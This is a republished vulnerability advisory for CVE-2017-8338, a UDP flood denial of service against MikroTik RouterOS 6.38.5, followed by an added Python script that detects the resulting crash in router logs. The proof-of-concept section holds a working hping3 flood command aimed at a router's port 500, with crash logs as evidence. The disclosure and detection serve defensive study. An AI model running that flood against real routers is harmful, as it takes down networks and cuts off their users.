MikroTik UDP Flood Denial of Service

Published: 2017.05.10
Credit: Hosein Askari
Risk: Medium
CWE: CWE-400
CVE: CVE-2017-8338
Local: No
Remote: Yes

################
#Exploit Title: MikroTik UDP Flood Denial of Service | kernel failure
#Reference: https://www.vulnerability-lab.com/get_content.php?id=2064
#CVE: CVE-2017-8338
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : V-6.38.5
#Exploit Tested on: Parrot Security OS
#Date: 09-05-2017
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#Description: A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically.
###############
Proof of Concept (PoC):
The denial of service vulnerability can be exploited by remote attackers without a user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.
hping3 --udp -p 6000 --destport 500 --flood [router's IP]
#########################
#Log:
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
########################
#The sample of "CPU Usage" :
[admin@MikroTik] > system resource monitor
cpu-used: 100%
cpu-used-per-cpu: 100%
free-memory: 2487KiB
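
Added example (not part of the original advisory or of any MikroTik tooling): a small Python check that scans exported RouterOS log lines for the crash signature shown in the log above, a watchdog reboot close in time to an out-of-memory or kernel-failure entry. The function names, the 10-minute window and the fourth sample line are assumptions made for this illustration.

```python
import re
from datetime import datetime, timedelta

# Layout seen in the advisory's log: "apr/27/2017 04:37:47 topic,topic message"
LINE_RE = re.compile(r"^(\w{3})/(\d{2})/(\d{4}) (\d{2}):(\d{2}):(\d{2}) (\S+) (.+)$")
MONTHS = "jan feb mar apr may jun jul aug sep oct nov dec".split()
# Message fragments copied from the advisory's log excerpt.
SIGNATURES = {
    "kernel_failure": "kernel failure in previous boot",
    "out_of_memory": "out of memory condition was detected",
    "watchdog_reboot": "rebooted without proper shutdown by watchdog timer",
}

def parse_line(line):
    """Return (timestamp, topics, message), or None if the line does not parse."""
    m = LINE_RE.match(line.strip())
    if not m or m.group(1).lower() not in MONTHS:
        return None
    mon, day, year, hh, mm, ss = m.groups()[:6]
    try:
        ts = datetime(int(year), MONTHS.index(mon.lower()) + 1, int(day),
                      int(hh), int(mm), int(ss))
    except ValueError:  # e.g. day 31 in a 30-day month
        return None
    return ts, m.group(7).split(","), m.group(8)

def crash_events(lines):
    """Sorted (timestamp, name) pairs for critical entries matching SIGNATURES."""
    events = []
    for ts, topics, msg in filter(None, map(parse_line, lines)):
        if "critical" in topics:
            events += [(ts, n) for n, frag in SIGNATURES.items() if frag in msg]
    return sorted(events)

def exhaustion_crash(lines, window=timedelta(minutes=10)):
    """True if a watchdog reboot and an OOM/kernel-failure entry lie within
    `window`. That shows a resource-exhaustion crash, not its cause."""
    events = crash_events(lines)
    reboots = [t for t, n in events if n == "watchdog_reboot"]
    faults = [t for t, n in events if n != "watchdog_reboot"]
    return any(abs(r - f) <= window for r in reboots for f in faults)

# The advisory's three entries plus one constructed, unrelated line.
SAMPLE = """\
apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot
apr/27/2017 04:37:47 system,error,critical out of memory condition was detected
apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer
apr/27/2017 04:38:02 system,info,account user admin logged in via ssh
""".splitlines()
```

A match means the router crashed from resource exhaustion; confirming a UDP 500 flood as the cause still requires interface or firewall counters from the time of the crash.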

References:

https://www.vulnerability-lab.com/get_content.php?id=2064



Copyright 2017, cxsecurity.com